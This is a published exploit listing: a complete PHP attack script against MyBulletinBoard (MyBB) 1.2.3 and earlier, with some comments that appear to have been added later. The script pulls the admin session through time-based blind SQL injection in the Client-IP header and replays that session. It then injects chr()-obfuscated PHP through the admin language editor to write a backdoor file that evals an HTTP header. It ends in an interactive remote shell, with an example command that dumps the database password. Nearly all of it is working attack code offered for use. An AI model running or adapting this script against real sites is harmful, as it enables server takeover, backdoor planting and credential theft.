mybb-exec.txt

04 Apr 2007 00:00:00 — Reported by DarkFig — Type: packetstorm

MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit

Code
`#!/usr/bin/php  
<?php  
/**  
* This file requires the PhpSploit class.  
* If you want to use this class, the latest  
* version can be downloaded from acid-root.new.fr.  
**/  
# The PhpSploit HTTP helper class (see the header note for where to get it);
# every request to the target below goes through a phpsploit instance.
require('phpsploitclass.php');
# Everything except E_NOTICE is reported.
error_reporting(E_ALL & ~E_NOTICE);
  
# http://www.milw0rm.com/exploits/2012  
# After that advisory they wrapped a lot of (but not all) the SQL queries that use the IP address in $db->escape_string.  
# They did not fix the function itself (a choice, and a bad one) and they forgot to fix one (just one) SQL query.  
# The problem has to be fixed at its source =)  
#  
# Print the usage banner and stop unless at least "-url <target>" was given
# (script name + 2 tokens is the minimum argument count).
if ($argc < 3) {
    print <<<USAGE

--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---
-----------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <[email protected]>
URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
Usage: $argv[0] -url http://victim.com/ [Options]
Params: -url For example http://victim.com/myBB/
Options: -debug Debug mod activated (debug_mybb.html)
-truetime Server response time which returns true
-benchmark You can change the value used in benchmark()
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
Note: If you have some problems use -debug, -benchmark, -truetime
-----------------------------------------------------------------------

USAGE;
    exit(1);
}
  
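# --- Command-line parameters ---------------------------------------------------
# -url is mandatory (getparam() exits with a message when it is missing); the rest are optional.
$url = getparam('url', 1);
$debug = (getparam('debug') != '') ? 1 : 0;
# Iteration count handed to MySQL BENCHMARK(): the delay that marks a TRUE probe in sql_inject().
$benchmark = (getparam('benchmark') != '') ? getparam('benchmark') : '1000000';
# FIX: the original called getparam($proxy) / getparam($proxyauth) with the still-undefined
# variables instead of the option names, so -proxy and -proxyauth were silently ignored.
$proxy = getparam('proxy');
$proxyauth = getparam('proxyauth');

# Path (relative to $url) where the dropped PHP shell is written, and the ACP language
# file that is abused to write it. The author's alternative path: inc/cache/backdoor.php
$backdoor = 'uploads/avatars/backdoor.php';
$filetoed = 'index.lang.php';

# HTTP client used for every request below.
$xpl = new phpsploit();
$xpl->agent('Firefox');
if ($proxy) $xpl->proxy($proxy);
if ($proxyauth) $xpl->proxyauth($proxyauth);
if ($debug) debug(1); # start a fresh debug_mybb.html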
  
# There are two ways to get logged in as administrator.  
#  
# SOLUTION NUMBER 1  
# mysql> select * from mybb_users\G  
# *************************** 1. row ***************************  
# uid: 1  
# username: root  
# password: 39ac8681f5cf4fcd9c9c09719a618bd3  
# salt: BFeJBOCF  
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...  
#  
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');  
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...  
#   
# SOLUTION NUMBER 2  
# mysql> select * from mybb_adminsessions\G  
# *************************** 1. row ***************************  
# sid: 81e267263b9254f3aaf670383bfbfec9  
# uid: 1  
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA  
# ip: 127.0.0.1  
# dateline: 1175443967  
# lastactive: 1175444369  
#  
# $xpl->addheader('Client-IP','127.0.0.1');  
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');  
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...  
#  
# I decided to use the solution number 2.  
# We can also add an administrator (easily) ... but it's not interesting.  
#  
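# --- Step 1: recover the newest admin session through time-based blind SQL injection ---
# Both values come from the most recently active <prefix>adminsessions row (see sql_inject()).
print "\nAdmin IP : "; $ip = sql_inject('ip');
print "\nAdmin sid: "; $sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";

# --- Step 2: replay the admin session ------------------------------------------------
# The admin session carries the IP it was opened from, and get_ip() (quoted in sql_inject())
# trusts the Client-IP header, so spoofing that header is enough to reuse the stolen adminsid.
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid=$sid");

# Language preselected in the ACP language editor; fall back to english if the form is not found.
if (preg_match('#<input type="hidden" name="lang" value="(\S*)"#', $xpl->getcontent(), $langmatches)) $lang = $langmatches[1];
else $lang = 'english';
print "\nLanguage: $lang";

# --- Step 3: inject PHP into a language file through the ACP editor ------------------
$xpl->get($url . "admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);

# FIX: with no textarea on the page the original appended to an undefined index, posted an
# empty form and still announced success. Stop here instead: the session replay (wrong ip/sid)
# or the language detection most likely failed.
if (empty($name_value[1])) {
    print "\nNo language variables found in $filetoed - session replay or language detection failed.\n";
    exit(1);
}

# The editor rejects <? / <?php, <script language="php"> and both quote characters, so the
# payload is a chain of ${${expr}} variable-variable evaluations with every string literal
# spelled as a chr() chain (chrit()). When the language file is evaluated it writes the
# backdoor, which eval()s whatever arrives in the "Shell" request header.
$PHPCODE = '${${error_reporting(0)}}'
    . '${${$handle=fopen(' . chrit('./' . $backdoor) . ',' . chrit('w') . ')}}'
    . '${${fwrite($handle,' . chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>') . ')}}'
    . '${${fclose($handle)}}';
$name_value[2][0] .= $PHPCODE;

# frmdt_url is presumably a constant provided by phpsploitclass.php (the form's action URL).
$postdata = array(frmdt_url => $url . 'admin/languages.php',
    "adminsid" => $sid, "action" => "do_edit",
    "lang" => $lang, "editwith" => 0,
    "inadmin" => 0, "file" => $filetoed,
    "Update Language Variables" => " Update Language Variables");

# Re-post every existing variable (HTML-decoded) so the file is otherwise left as it was.
for ($i = 0; $i < count($name_value[1]); $i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);

# print $xpl->showlastrequest();
$xpl->formdata($postdata);

# --- Step 4: evaluate the language file so the backdoor gets written -----------------
$xpl->get($url . 'index.php');

# If $lang is not the board default, index.php will not include it: request the file directly.
$xpl->get($url . 'inc/languages/' . $lang . '/' . $filetoed);
print "\nThe php file should be created\n\$shell> ";

# --- Step 5: interactive shell -------------------------------------------------------
# $cmd is spliced unescaped into system('...'), so a single quote in the input ends the
# system() string. The author's example "command" relies on exactly that to dump the DB
# password through the backdoor's eval():
#   ');include('../../inc/config.php');print $config['password'];//
# FIX: fgets() returns false on EOF (Ctrl-D / closed stdin); the original trimmed it to ''
# and kept sending empty commands forever. Treat EOF like "quit".
while (($line = fgets(STDIN)) !== false && !preg_match("#^(quit|exit)$#", ($cmd = trim($line)))) {
    $xpl->addheader('Shell', "system('$cmd');");
    $xpl->get($url . $backdoor);
    print $xpl->getcontent() . "\n\$shell> ";
}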
  
/**
 * Time-based blind SQL injection through the Client-IP header.
 *
 * MyBB's get_ip() (quoted below) returns HTTP_CLIENT_IP unfiltered and create_session()
 * (quoted below) splices that value unescaped into
 *   DELETE FROM <prefix>sessions WHERE ip='...'
 * Each probe closes that quote and appends IF(<one-character test>, BENCHMARK($benchmark,...), 1):
 * a response at least as slow as the calibrated TRUE time means the test held.
 *
 * $field  column to extract ('ip' or 'sid') from the most recently active <prefix>adminsessions row.
 * Returns the recovered value as a string; each character is printed (lower-cased) as it is found.
 *
 * The character-code range $a..$b is overloaded: code $a is the calibration probe (always-TRUE
 * condition, sets $truetime), code $a+1 is the end-of-string probe, every later code is a real
 * candidate. $prefix is scraped from an error page on the very first probe.
 * Probe state is shared with debug() through globals ($result, $bef, $aft, $truetime,
 * $benchmark, $a, $b, $sub, $f).
 *
 * NOTE(review): there is no retry cap. If the target never produces a delayed response (not
 * vulnerable, BENCHMARK too small, MySQL errors not echoed, network jitter) this never returns;
 * -debug, -benchmark and -truetime are the only knobs.
 */
function sql_inject($field)
{
global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
$sub=0;$string='';

# Candidate character codes. Codes $a and $a+1 are taken by the TST / NULL probes below, so the
# real candidates are 46-57 ('.', '/', '0'-'9') for ip and 48-70 ('0'-'9', ':'..'@', 'A'-'F')
# for the md5-hex sid. Matching upper-case 'A'-'F' against a lower-case hex sid relies on a
# case-insensitive MySQL comparison; the strtolower() when printing reflects that expectation.
if($field=='ip') {$a='44';$b='57';} # . 0-9
else {$a='46';$b='70';} # 0-9 A-F (see above)

while(TRUE)
{
# $sub is the 1-based SUBSTR() position currently being recovered.
$sub++;
for($i=$a;$i<=$b;$i++)
{
# Random ip (the benign part of the spoofed header); nothing security-relevant rides on it, so rand() is fine.
$fakeip = rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254);

# Calculation of the server response time which returns TRUE
if($i==$a) $f='TST';

# End of the string ?
elseif($i==($a+1)) $f='NULL';

# Test the char
else $f=$i;

# Table prefix - first probe only: break the query with a quote and scrape the prefix out of
# the echoed "DELETE FROM <prefix>sessions" error (assumes MySQL errors are shown on the page);
# falls back to the default mybb_ prefix otherwise.
if($sub==1 AND $i==$a)
{
$xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>");
$xpl->get($url.'index.php');

if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
else $prefix='mybb_';
}

# +-class_session.php (#2)
# |
# 475. function create_session($uid=0)
# 476. {
# 477. global $db;
# 478. $speciallocs = $this->get_special_locations();
# 479.
# 480. // If there is a proper uid, delete by uid.
# 481. if($uid > 0)
# 482. {
# 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
# 484. $onlinedata['uid'] = $uid;
# 485. }
# 486. // Else delete by ip.
# 487. else
# 488. { // $this->ipaddress = get_ip();
# 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
# 490. $onlinedata['uid'] = 0;
# 491. }
#
# Probe: <fakeip>' OR ip=(SELECT IF(SUBSTR(<value>,<pos>,1)=CHAR(<code>),BENCHMARK(...),1)) #
#  - TST : SUBSTR((SELECT 1),1,1)=CHAR(49) is '1'='1', always TRUE -> measures a TRUE response.
#  - NULL: CHAR(NULL) is an empty string in MySQL, so this holds once SUBSTR() runs past the end.
#  - else: compares position $sub of the adminsessions value with character code $f.
# The trailing # comments out the remainder of MyBB's own query.
$sql = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
$sql .= ($f=='TST') ? ",1" : ",$sub";
$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";


# +-functions.php (#1)
# |
# 1836. function get_ip()
# 1837. {
# 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
# 1839. {
# 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
# 1841. {
# 1842. foreach($addresses[0] as $key => $val)
# 1843. {
# 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
# 1845. {
# 1846. $ip = $val;
# 1847. break;
# 1848. }
# 1849. }
# 1850. }
# 1851. }
# 1852. if(!isset($ip))
# 1853. {
# 1854. if(isset($_SERVER['HTTP_CLIENT_IP']))
# 1855. {
# 1856. $ip = $_SERVER['HTTP_CLIENT_IP'];
# 1857. }
# 1858. else
# 1859. {
# 1860. $ip = $_SERVER['REMOTE_ADDR'];
# 1861. }
# 1862. }
# 1863. return $ip;
# 1864. }
#
# Time the probe with whole-second resolution (time()). Headers are reset first so only the
# probe header is sent (this also drops the prefix-detection header from above).
$bef = time();
$xpl->reset('header');
$xpl->addheader('Client-IP',$sql);
$xpl->get($url.'index.php');
$aft = time();

# The calibration probe defines $truetime unless -truetime overrides it.
if($f=='TST') $truetime=$aft-$bef;
if(getparam('truetime')!='') $truetime=getparam('truetime');

# Server response time >= Server response time which returns TRUE ? (the calibration probe itself never counts)
$restime = $aft-$bef;
if($restime >= $truetime AND $f != 'TST') $result='TRUE';
else $result='FALSE';

# Debug mode activated
if($debug) debug('',$field);

# The tested char returns TRUE
if($result=='TRUE')
{
if($f!='NULL')
{
# Continue with the next position
print strtolower(chr($f));
$string .= chr($f);
break;
}
else
{
# End of the string
$xpl->reset('header');
return $string;
}
}

# Retry if no char found: the whole charset was exhausted at this position, so undo the
# increment and let the outer loop probe the same position again (no upper bound on retries).
if($f==$b) $sub--;
}
}
}
  
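/**
 * Write the -debug trace file debug_mybb.html.
 *
 * debug(1) (re)creates the file with the table header; debug('', $dafield) appends one row
 * describing the probe sql_inject() just sent: request/response timestamps, the calibrated
 * TRUE time, the BENCHMARK() count, the verdict, the field being extracted ($dafield: 'ip'
 * or 'sid'), the charset bounds, the SUBSTR() position and the probed character code.
 * Rows judged TRUE are highlighted yellow. Everything except $dafield is read from the
 * globals that sql_inject() maintains. Returns nothing; silently does nothing if the file
 * cannot be opened.
 */
function debug($init='',$dafield='')
{
    global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
    if ($init) {
        $handle = fopen("debug_mybb.html", "w+");
        # FIX: the original fwrite()'d to false when the file could not be created.
        if ($handle === false) return;
        # Continuation lines of the literal stay at column 0: their leading whitespace is part of the string.
        $data = "<h1><div align='center'>MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit</div></h1>
<pre><table width='0' border='1' align='center' cellspacing='0'><tr>
<td align='center'><b>REQUEST TIME</b></td>
<td align='center'><b>RESPONSE TIME</b></td>
<td align='center'><b>TRUETIME</b></td>
<td align='center'><b>BENCHMARK</b></td>
<td align='center'><b>RESULT</b></td>";
        # <td align='center'><b>IP</b></td>
        $data .= "<td align='center'><b>FIELD</b></td>
<td align='center'><b>CHARSET</b></td>
<td align='center'><b>SUBSTR()</b></td>
<td align='center'><b>ORD()</b></td>
<td align='center'><b>CHAR()</b></td>";
        fwrite($handle, $data);
        fclose($handle);
    } else {
        $handle = fopen("debug_mybb.html", "a");
        if ($handle === false) return;
        # FIX: $f is the string 'TST' or 'NULL' on the calibration / end-of-string probes, and
        # chr() on a non-numeric string is a TypeError on PHP 8 (earlier versions warn and yield
        # nothing useful). Show those rows with an empty CHAR() cell instead of crashing.
        $probed = is_numeric($f) ? chr((int)$f) : '';
        # (string) casts: $truetime may still be null before calibration, which htmlentities() no longer accepts quietly.
        $data = "<tr" . (($result == 'TRUE') ? " bgcolor='#FFFF00'" : "") . ">
<td align='center'>&nbsp;" . htmlentities((string)$bef) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$aft) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$truetime) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$benchmark) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$result) . "&nbsp;</td>";
        # <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td>
        $data .= "<td align='center'>&nbsp;" . htmlentities((string)$dafield) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities("$a-$b") . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$sub) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities((string)$f) . "&nbsp;</td>
<td align='center'>&nbsp;" . htmlentities($probed) . "&nbsp;</td></tr>";
        fwrite($handle, $data);
        fclose($handle);
    }
}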
  
/**
 * Encode $string as a PHP expression built only from chr() calls joined with '.',
 * e.g. "ab" -> "chr(97).chr(98)". This lets string literals ride inside the
 * language-file payload without the quote characters the ACP editor rejects.
 * Byte-wise; returns '' for an empty input.
 */
function chrit($string)
{
    $calls = array();
    foreach (unpack('C*', $string) as $byte) {
        $calls[] = 'chr(' . $byte . ')';
    }
    return implode('.', $calls);
}
  
/**
 * Look up the command-line option "-$param" in $argv.
 * Returns the token that follows it, or 1 when the option is present but has no
 * (non-empty) following token, or null when the option is absent. With $opt truthy
 * an absent option terminates the script with a "parameter required" message.
 */
function getparam($param,$opt='')
{
    global $argv;
    $pos = array_search('-' . $param, $argv);
    if ($pos !== false) {
        $next = isset($argv[$pos + 1]) ? $argv[$pos + 1] : '';
        return empty($next) ? 1 : $next;
    }
    if ($opt) exit("\n-$param parameter required");
    return null;
}
?>  
`
